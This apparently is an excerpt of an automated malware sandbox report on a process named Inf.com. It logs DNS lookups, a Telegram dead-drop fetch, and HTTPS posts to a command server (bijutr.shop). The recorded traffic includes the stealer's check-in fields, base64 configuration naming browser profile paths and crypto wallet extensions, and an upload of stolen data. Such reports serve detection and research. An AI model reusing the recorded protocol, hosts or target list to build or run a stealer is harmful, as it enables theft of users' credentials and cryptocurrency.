                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:28.727411032 CET1.1.1.1192.168.2.50x7946No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:28.727423906 CET1.1.1.1192.168.2.50x388aNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:28.730139971 CET1.1.1.1192.168.2.50x219cNo error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:28.730139971 CET1.1.1.1192.168.2.50x219cNo error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:28.730242968 CET1.1.1.1192.168.2.50x937dNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:28.730977058 CET1.1.1.1192.168.2.50x92ddNo error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:28.730977058 CET1.1.1.1192.168.2.50x92ddNo error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:28.731477022 CET1.1.1.1192.168.2.50xcbb4No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:28.957422018 CET1.1.1.1192.168.2.50x845dNo error (0)sb.scorecardresearch.com18.165.220.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:28.957422018 CET1.1.1.1192.168.2.50x845dNo error (0)sb.scorecardresearch.com18.165.220.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:28.957422018 CET1.1.1.1192.168.2.50x845dNo error (0)sb.scorecardresearch.com18.165.220.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:28.957422018 CET1.1.1.1192.168.2.50x845dNo error (0)sb.scorecardresearch.com18.165.220.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:28.963973999 CET1.1.1.1192.168.2.50x471aNo error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:28.964276075 CET1.1.1.1192.168.2.50xb0cbNo error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:29.100234985 CET1.1.1.1192.168.2.50x899aNo error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:29.102147102 CET1.1.1.1192.168.2.50x8db4No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:29.235974073 CET1.1.1.1192.168.2.50xcab5No error (0)api.msn.comapi-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:29.237844944 CET1.1.1.1192.168.2.50xbbf1No error (0)api.msn.comapi-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:31.120441914 CET1.1.1.1192.168.2.50xa637No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:31.120441914 CET1.1.1.1192.168.2.50xa637No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                                                                                                                                                                                  • t.me
                                                                                                                                                                                                                                                                                                  • bijutr.shop
                                                                                                                                                                                                                                                                                                  • www.google.com
                                                                                                                                                                                                                                                                                                  • chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                  • clients2.googleusercontent.com
                                                                                                                                                                                                                                                                                                  • https:
                                                                                                                                                                                                                                                                                                    • sb.scorecardresearch.com
                                                                                                                                                                                                                                                                                                    • browser.events.data.msn.com
                                                                                                                                                                                                                                                                                                    • c.msn.com

                                                                                                                                                                                                                                                                                                  HTTPS Proxied Packets

                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                  0192.168.2.549750149.154.167.994431276C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                  2024-12-27 06:00:39 UTC85OUTGET /k04ael HTTP/1.1
                                                                                                                                                                                                                                                                                                  Host: t.me
                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                  2024-12-27 06:00:40 UTC512INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                  Date: Fri, 27 Dec 2024 06:00:40 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                  Content-Length: 12298
                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                  Set-Cookie: stel_ssid=588d1eda4582a992fd_15225848869441408925; expires=Sat, 28 Dec 2024 06:00:40 GMT; path=/; samesite=None; secure; HttpOnly
                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                  Cache-control: no-store
                                                                                                                                                                                                                                                                                                  X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                                                                                                                                                                                                                                                                                  Content-Security-Policy: frame-ancestors https://web.telegram.org
                                                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=35768000
                                                                                                                                                                                                                                                                                                  2024-12-27 06:00:40 UTC12298INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 6b 30 34 61 65 6c 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74
                                                                                                                                                                                                                                                                                                  Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @k04ael</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.parent


                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                  1192.168.2.549756188.245.216.2054431276C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                  2024-12-27 06:00:42 UTC231OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                  Host: bijutr.shop
                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                  2024-12-27 06:00:43 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                  Date: Fri, 27 Dec 2024 06:00:42 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                  2024-12-27 06:00:43 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                  2192.168.2.549762188.245.216.2054431276C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                  2024-12-27 06:00:44 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----U3E3EC2VAAAIEUKFK6XB
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                  Host: bijutr.shop
                                                                                                                                                                                                                                                                                                  Content-Length: 256
                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                  2024-12-27 06:00:44 UTC256OUTData Raw: 2d 2d 2d 2d 2d 2d 55 33 45 33 45 43 32 56 41 41 41 49 45 55 4b 46 4b 36 58 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 45 46 42 39 38 31 41 41 31 43 44 33 39 33 35 34 33 30 31 34 39 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 55 33 45 33 45 43 32 56 41 41 41 49 45 55 4b 46 4b 36 58 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 38 36 30 35 36 39 34 34 35 32 30 37 66 31 31 39 38 66 33 31 32 37 61 32 65 30 64 34 61 32 39 0d 0a 2d 2d 2d 2d 2d 2d 55 33 45 33 45 43 32 56 41 41 41 49 45 55 4b 46 4b 36 58 42 2d 2d 0d
                                                                                                                                                                                                                                                                                                  Data Ascii: ------U3E3EC2VAAAIEUKFK6XBContent-Disposition: form-data; name="hwid"AEFB981AA1CD3935430149-a33c7340-61ca------U3E3EC2VAAAIEUKFK6XBContent-Disposition: form-data; name="build_id"7860569445207f1198f3127a2e0d4a29------U3E3EC2VAAAIEUKFK6XB--
                                                                                                                                                                                                                                                                                                  2024-12-27 06:00:45 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                  Date: Fri, 27 Dec 2024 06:00:45 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                  2024-12-27 06:00:45 UTC69INData Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 61 39 64 32 36 63 35 34 32 31 38 37 62 31 62 64 38 66 66 61 32 38 31 32 30 66 30 62 33 62 38 61 7c 31 7c 30 7c 31 7c 31 7c 30 7c 35 30 30 30 30 7c 30 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                  Data Ascii: 3a1|1|1|1|a9d26c542187b1bd8ffa28120f0b3b8a|1|0|1|1|0|50000|00


                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                  3192.168.2.549768188.245.216.2054431276C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                  2024-12-27 06:00:47 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----OHL68YCT00ZMYMG4OHVK
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                  Host: bijutr.shop
                                                                                                                                                                                                                                                                                                  Content-Length: 331
                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                  2024-12-27 06:00:47 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 4f 48 4c 36 38 59 43 54 30 30 5a 4d 59 4d 47 34 4f 48 56 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 39 64 32 36 63 35 34 32 31 38 37 62 31 62 64 38 66 66 61 32 38 31 32 30 66 30 62 33 62 38 61 0d 0a 2d 2d 2d 2d 2d 2d 4f 48 4c 36 38 59 43 54 30 30 5a 4d 59 4d 47 34 4f 48 56 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 38 36 30 35 36 39 34 34 35 32 30 37 66 31 31 39 38 66 33 31 32 37 61 32 65 30 64 34 61 32 39 0d 0a 2d 2d 2d 2d 2d 2d 4f 48 4c 36 38 59 43 54 30 30 5a 4d 59 4d 47 34 4f 48 56 4b 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                  Data Ascii: ------OHL68YCT00ZMYMG4OHVKContent-Disposition: form-data; name="token"a9d26c542187b1bd8ffa28120f0b3b8a------OHL68YCT00ZMYMG4OHVKContent-Disposition: form-data; name="build_id"7860569445207f1198f3127a2e0d4a29------OHL68YCT00ZMYMG4OHVKCont
                                                                                                                                                                                                                                                                                                  2024-12-27 06:00:48 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                  Date: Fri, 27 Dec 2024 06:00:47 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                  2024-12-27 06:00:48 UTC2192INData Raw: 38 38 34 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4d 36 58 46 42 79 62 32 64 79 59 57 30 67 52 6d 6c 73 5a 58 4e 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 42 63 48 42 73 61 57 4e 68 64 47 6c 76 62 6c 78 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 49 45 4e 68 62 6d 46 79 65 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 53 42 54 65 46 4e 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 77 6c 54 45 39 44 51 55 78 42 55 46 42 45 51 56 52 42 4a 56 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46
                                                                                                                                                                                                                                                                                                  Data Ascii: 884R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEM6XFByb2dyYW0gRmlsZXNcR29vZ2xlXENocm9tZVxBcHBsaWNhdGlvblx8Y2hyb21lLmV4ZXxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXwlTE9DQUxBUFBEQVRBJVxHb29nbGVcQ2hyb21lIF


                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                  4192.168.2.549774188.245.216.2054431276C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                  2024-12-27 06:00:49 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----6FCB1VS0ZU37YM79ZUS0
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                  Host: bijutr.shop
                                                                                                                                                                                                                                                                                                  Content-Length: 331
                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                  2024-12-27 06:00:49 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 36 46 43 42 31 56 53 30 5a 55 33 37 59 4d 37 39 5a 55 53 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 39 64 32 36 63 35 34 32 31 38 37 62 31 62 64 38 66 66 61 32 38 31 32 30 66 30 62 33 62 38 61 0d 0a 2d 2d 2d 2d 2d 2d 36 46 43 42 31 56 53 30 5a 55 33 37 59 4d 37 39 5a 55 53 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 38 36 30 35 36 39 34 34 35 32 30 37 66 31 31 39 38 66 33 31 32 37 61 32 65 30 64 34 61 32 39 0d 0a 2d 2d 2d 2d 2d 2d 36 46 43 42 31 56 53 30 5a 55 33 37 59 4d 37 39 5a 55 53 30 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                  Data Ascii: ------6FCB1VS0ZU37YM79ZUS0Content-Disposition: form-data; name="token"a9d26c542187b1bd8ffa28120f0b3b8a------6FCB1VS0ZU37YM79ZUS0Content-Disposition: form-data; name="build_id"7860569445207f1198f3127a2e0d4a29------6FCB1VS0ZU37YM79ZUS0Cont
                                                                                                                                                                                                                                                                                                  2024-12-27 06:00:50 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                  Date: Fri, 27 Dec 2024 06:00:50 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                  2024-12-27 06:00:50 UTC5837INData Raw: 31 36 63 30 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                                                                                                                                                                                                                                                                  Data Ascii: 16c0TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                  5192.168.2.549780188.245.216.2054431276C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                  2024-12-27 06:00:51 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----CJMY5FC2NGVAIM790ZUS
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                  Host: bijutr.shop
                                                                                                                                                                                                                                                                                                  Content-Length: 332
                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                  2024-12-27 06:00:51 UTC332OUTData Raw: 2d 2d 2d 2d 2d 2d 43 4a 4d 59 35 46 43 32 4e 47 56 41 49 4d 37 39 30 5a 55 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 39 64 32 36 63 35 34 32 31 38 37 62 31 62 64 38 66 66 61 32 38 31 32 30 66 30 62 33 62 38 61 0d 0a 2d 2d 2d 2d 2d 2d 43 4a 4d 59 35 46 43 32 4e 47 56 41 49 4d 37 39 30 5a 55 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 38 36 30 35 36 39 34 34 35 32 30 37 66 31 31 39 38 66 33 31 32 37 61 32 65 30 64 34 61 32 39 0d 0a 2d 2d 2d 2d 2d 2d 43 4a 4d 59 35 46 43 32 4e 47 56 41 49 4d 37 39 30 5a 55 53 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                  Data Ascii: ------CJMY5FC2NGVAIM790ZUSContent-Disposition: form-data; name="token"a9d26c542187b1bd8ffa28120f0b3b8a------CJMY5FC2NGVAIM790ZUSContent-Disposition: form-data; name="build_id"7860569445207f1198f3127a2e0d4a29------CJMY5FC2NGVAIM790ZUSCont
                                                                                                                                                                                                                                                                                                  2024-12-27 06:00:53 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                  Date: Fri, 27 Dec 2024 06:00:52 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                  2024-12-27 06:00:53 UTC119INData Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                  Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                  6192.168.2.549786188.245.216.2054431276C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                  2024-12-27 06:00:54 UTC324OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----CT00ZMYUSJMYM7QI5FKN
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                  Host: bijutr.shop
                                                                                                                                                                                                                                                                                                  Content-Length: 7877
                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                  2024-12-27 06:00:54 UTC7877OUTData Raw: 2d 2d 2d 2d 2d 2d 43 54 30 30 5a 4d 59 55 53 4a 4d 59 4d 37 51 49 35 46 4b 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 39 64 32 36 63 35 34 32 31 38 37 62 31 62 64 38 66 66 61 32 38 31 32 30 66 30 62 33 62 38 61 0d 0a 2d 2d 2d 2d 2d 2d 43 54 30 30 5a 4d 59 55 53 4a 4d 59 4d 37 51 49 35 46 4b 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 38 36 30 35 36 39 34 34 35 32 30 37 66 31 31 39 38 66 33 31 32 37 61 32 65 30 64 34 61 32 39 0d 0a 2d 2d 2d 2d 2d 2d 43 54 30 30 5a 4d 59 55 53 4a 4d 59 4d 37 51 49 35 46 4b 4e 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                  Data Ascii: ------CT00ZMYUSJMYM7QI5FKNContent-Disposition: form-data; name="token"a9d26c542187b1bd8ffa28120f0b3b8a------CT00ZMYUSJMYM7QI5FKNContent-Disposition: form-data; name="build_id"7860569445207f1198f3127a2e0d4a29------CT00ZMYUSJMYM7QI5FKNCont
                                                                                                                                                                                                                                                                                                  2024-12-27 06:00:55 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                  Date: Fri, 27 Dec 2024 06:00:55 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                  2024-12-27 06:00:55 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                  Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
